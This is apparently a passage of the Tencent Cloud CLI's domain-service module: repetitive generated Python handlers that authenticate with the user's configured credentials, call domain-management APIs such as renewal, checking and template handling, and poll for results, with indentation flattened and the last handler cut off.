# -*- coding: utf-8 -*-
import os
import sys
import six
import json
import tccli.options_define as OptionsDefine
import tccli.format_output as FormatOutput
from tccli import __version__
from tccli.utils import Utils
from tccli.exceptions import ConfigurationError, ClientError, ParamError
from tencentcloud.common import credential
from tencentcloud.common.profile.http_profile import HttpProfile
from tencentcloud.common.profile.client_profile import ClientProfile
from tencentcloud.domain.v20180808 import domain_client as domain_client_v20180808
from tencentcloud.domain.v20180808 import models as models_v20180808
from jmespath import search
import time
def doSetDomainAutoRenew(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.DomainClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.SetDomainAutoRenewRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.SetDomainAutoRenew(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
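# Illustrative sketch, not part of the generated CLI: every handler in this
# module repeats the same polling ("waiter") loop. The pattern in isolation;
# "call", "expr", "expected", "timeout" and "interval" are hypothetical
# parameters standing in for the values the handlers pull from g_param.
def wait_until(call, expr, expected, timeout, interval):
    start_time = time.time()
    while True:
        json_obj = json.loads(call().to_json_string())
        if search(expr, json_obj) == expected:
            return json_obj
        if time.time() - start_time >= timeout:
            raise ClientError('Request timeout, wait `%s` to `%s` timeout' %
                              (expr, expected))
        print('Inquiry result is %s.' % search(expr, json_obj))
        time.sleep(interval)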
def doCheckBatchStatus(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.DomainClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CheckBatchStatusRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.CheckBatchStatus(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doUploadImage(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.DomainClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.UploadImageRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.UploadImage(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doSendPhoneEmailCode(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.DomainClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.SendPhoneEmailCodeRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.SendPhoneEmailCode(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeDomainNameList(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.DomainClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeDomainNameListRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.DescribeDomainNameList(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeletePhoneEmail(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.DomainClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeletePhoneEmailRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.DeletePhoneEmail(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeDomainBaseInfo(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.DomainClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeDomainBaseInfoRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.DescribeDomainBaseInfo(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeBatchOperationLogDetails(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.DomainClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeBatchOperationLogDetailsRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.DescribeBatchOperationLogDetails(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.DomainClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeleteTemplateRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.DeleteTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCheckDomain(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.DomainClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CheckDomainRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.CheckDomain(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doRenewDomainBatch(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.DomainClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.RenewDomainBatchRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.RenewDomainBatch(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.DomainClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeTemplateRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.DescribeTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
(g_param['OptionsDefine.WaiterInfo']['expr'], g_param['OptionsDefine.WaiterInfo']['to'],
search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreatePhoneEmail(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
cred = credential.CVMRoleCredential()
elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
cred = credential.STSAssumeRoleCredential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.RoleArn.replace('-', '_')],
g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
)
else:
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.DomainClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreatePhoneEmailRequest()
model.from_json_string(json.dumps(args))
start_time = time.time()
while True:
rsp = client.CreatePhoneEmail(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
if not g_param[OptionsDefine.Waiter] or search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj) == g_param['OptionsDefine.WaiterInfo']['to']:
break
cur_time = time.time()
if cur_time - start_time >= g_param['OptionsDefine.WaiterInfo']['timeout']:
raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
